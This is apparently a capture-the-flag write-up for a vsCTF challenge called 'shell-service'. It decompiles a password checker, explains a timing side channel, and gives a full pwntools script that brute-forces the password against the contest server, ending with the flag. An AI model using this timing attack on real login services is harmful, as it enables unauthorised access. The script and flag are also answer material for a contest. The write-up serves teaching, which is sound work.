Description

Analysis

Here is what we got for the challenge: a fake flag.txt, a password.txt.tar.gz file, and an executable named shs:

Archive:  shell-service.zip  
Length   Method    Size  Cmpr    Date    Time   CRC-32   Name  
--------  ------  ------- ---- ---------- ----- --------  ----  
      0  Stored        0   0% 2024-06-14 10:36 00000000  dist/  
     19  Stored       19   0% 2024-06-14 09:20 ea673e1b  dist/flag.txt  
53356555  Defl:X 53364981   0% 2024-06-14 10:34 7676c6f2  dist/password.txt.tar.gz  
  16904  Defl:X     3481  79% 2024-06-14 10:34 30f0670d  dist/shs  
--------          -------  ---                            -------  
53373478         53368481   0%                            4 files

The shs executable is a 64-bit Linux ELF file, not stripped, and includes all mitigations:

shs: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b9191fe56956287d0632bc7c58580751  
7f6dd6c5, for GNU/Linux 3.2.0, not stripped
   Arch:     amd64-64-little  
   RELRO:    Full RELRO  
   Stack:    Canary found  
   NX:       NX enabled  
   PIE:      PIE enabled

Decompilation of main

Here’s the decompilation of the main function using Ghidra. The function prompts the user to input a password, checks if the length is 10, and then compares each character of the input with the expected character retrieved from the getPassChar function. If the input matches the correct password, the user is granted a shell. Otherwise, the program exits.

void main(void)
{
  char cVar1;
  size_t sVar2;
  long in_FS_OFFSET;
  int local_24;
  char local_1b[11];
  long local_10;
 
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  puts("Enter the password:");
  fgets(local_1b, 0xb, stdin);
  sVar2 = strlen(local_1b);
 
  if ((int)sVar2 != 10) {
    puts("Wrong password!");
    exit(0);  // Exit if the length is not 10
  }
 
  for (local_24 = 0; local_24 < 10; local_24++) {
    cVar1 = getPassChar(local_24);
    if (cVar1 != local_1b[local_24]) {
      puts("Wrong password!");
      exit(0);  // Exit if any character does not match
    }
  }
 
  puts("Welcome, admin!");
  system("/bin/sh");  // Give a shell if the password is correct
 
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
}

Summary:

  • The function prompts the user to enter a password and reads the input.
  • It checks if the input length is exactly 10 characters.
  • It iterates over each character of the input, comparing it with the corresponding character returned by the getPassChar function.
  • If any character does not match, it prints “Wrong password!” and exits.
  • If all characters match, it prints “Welcome, admin!” and gives the user a shell.

Decompilation of getPassChar

Here is the decompilation of the getPassChar function, which extracts and returns a specific character from an archived file:

char getPassChar(uint param_1)
 
{
  int iVar1;
  char *pcVar2;
  long lVar3;
  long in_FS_OFFSET;
  char local_3e;
  undefined8 local_38;
  undefined8 local_30;
  char local_25 [10];
  char local_1b [11];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_30 = archive_read_new();
  archive_read_support_filter_all(local_30);
  archive_read_support_format_all(local_30);
  iVar1 = archive_read_open_filename(local_30,"password.txt.tar.gz",0x2800);
  if (iVar1 != 0) {
    puts("Failed to open archive");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  snprintf(local_25,10,"%d.txt",(ulong)param_1);
  do {
    iVar1 = archive_read_next_header(local_30,&local_38);
    if (iVar1 != 0) goto LAB_00101500;
    pcVar2 = (char *)archive_entry_pathname(local_38);
    iVar1 = strcmp("password.txt",pcVar2);
    if (iVar1 == 0) {
      lVar3 = archive_read_data(local_30,local_1b,10);
      if (lVar3 != 10) {
        puts("Failed to read password");
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      local_3e = local_1b[(int)param_1];
      goto LAB_00101500;
    }
    pcVar2 = (char *)archive_entry_pathname(local_38);
    iVar1 = strcmp(local_25,pcVar2);
  } while (iVar1 != 0);
  lVar3 = archive_read_data(local_30,local_1b,1);
  if (lVar3 != 1) {
    puts("Failed to read password");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_3e = local_1b[0];
LAB_00101500:
  if (local_3e == '\0') {
    puts("Failed to find password");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar1 = archive_read_free(local_30);
  if (iVar1 != 0) {
    puts("Failed to free archive");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  usleep(500000);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return local_3e;
}

Summary:

  • The function initializes an archive reader and sets up the necessary support for all filter and format types.
  • It attempts to open the archive password.txt.tar.gz. If it fails, it prints an error message and exits.
  • The function forms the file path using the given index (param_1) and prepares to search for this file in the archive.
  • Archive Reading Loop:
    • It iterates over the entries in the archive, checking for a file named password.txt.
    • If found, it reads the first 10 bytes and returns the character at the specified index (param_1).
    • If the specific indexed file is found, it reads a single byte and returns it.
  • If any reading or matching operation fails, it prints an error message and exits.
  • After finding the character, the function frees the archive resources and sleeps for half a second, then returns the character.

Solution

Time Based Side Channel Attack

As we observed in the analysis, the program sleeps for half a second each time it checks a character in the password. If the first character is correct, the program will sleep for one second in total because it will take half a second to check the first character and another half second to move on and check the next one. However, if the character is incorrect, the program won’t sleep for the additional half second since it won’t proceed to the next character.

By keeping track of the response times, we can figure out each character of the password. This method of exploiting the timing differences is known as a timing-based side channel attack.

Guessing The Password

In this scenario, we will create a password checker that determines if the password is correct based on the time it takes to respond to our input. The executable sleeps for half a second for each correct character but exits if a character is incorrect. The password is 10 characters long, and the checking starts from index 0 towards 10. So here is the approach:

  1. Start with a random 10-character string as our initial password guess.
  2. Iterate through each character in the password.
  3. For each character, replace it with every printable character one by one.
  4. Measure the response time for each attempt.
  5. If the response time exceeds (half a second multiplied by the current index), the character is correct.
  6. Update the password with the correct character and move to the next index.
  7. Repeat this process until all characters are correctly guessed.

Here are some limitations:

  • Network inconsistencies may affect response time measurements.
  • System resource usage and running processes can introduce variability in response times.

Implementation

The implementation of this side channel attack involves iterating through each character of a password, measuring the response time to determine correctness. We start by initializing the password with placeholder characters and defining our parameters, including an error tolerance to account for measurement inconsistencies.

First, we initialize the password and set the initial wait time and error tolerance:

password = list('?' * 10)
current_index = 0
wait_time = 0.5 # as from the binary (usleep(500000))
error_tolerance = 0.09 # to account for inconsistencies

Next, for each printable character c, update the password, send it, and measure the response time:

password[current_index] = c
 
start_time = time.time()
io.sendline(''.join(password).encode())
io.recvuntil(b'W')
end_time = time.time()

Calculate the duration of the response, compare it with the wait time, and update the index and wait time if the difference exceeds the error tolerance:

duration = end_time - start_time
dt = duration - wait_time
 
if dt > error_tolerance:
    current_index += 1
    wait_time = 0.5 * (current_index + 1)
    break

Finally, check if the password is correct by looking for the string ‘admin’ in the output:

output = io.clean()
 
if b'admin' in output: # as from the binary: puts("Welcome, admin!");
    print("Password:", "".join(password))
    exit()
    break

This method iterates through each character position, updates the guessed character, measures the response time, and uses the timing information to refine the password guess until the correct password is found.

Full Solve Script

from pwn import *
from string import printable
import time
 
context.log_level = 'warn'
 
def setup_connection():
    # io = process("./shs")
    io = remote('vsc.tf', 7004)
    io.recvuntil(b":")
 
    return io
 
password = list('?' * 10)
current_index = 0
wait_time = 0.5
error_tolerance = 0.09
 
with log.progress('Guessing Password', level=logging.WARN) as progress:
    while current_index < 10:
        for c in printable:
            try:
                io = setup_connection()
 
                password[current_index] = c
                progress.status(''.join(password))
 
                start_time = time.time()
                io.sendline(''.join(password).encode())
                io.recvuntil(b'W')
                end_time = time.time()
 
                output = io.clean()
 
                io.close()
 
                if b'elcome' in output:
                    print("Password:", "".join(password))
                    exit()
                    break
 
                duration = end_time - start_time
                dt = (duration - wait_time)
 
                if dt > error_tolerance:
                    current_index += 1
                    wait_time = 0.5 * (current_index + 1)
                    break
 
            except KeyboardInterrupt:
                exit()

The Flag

vsctf{h0w_much_t1m3_d1d_1t_t4k3_to_r3m3mb3r?}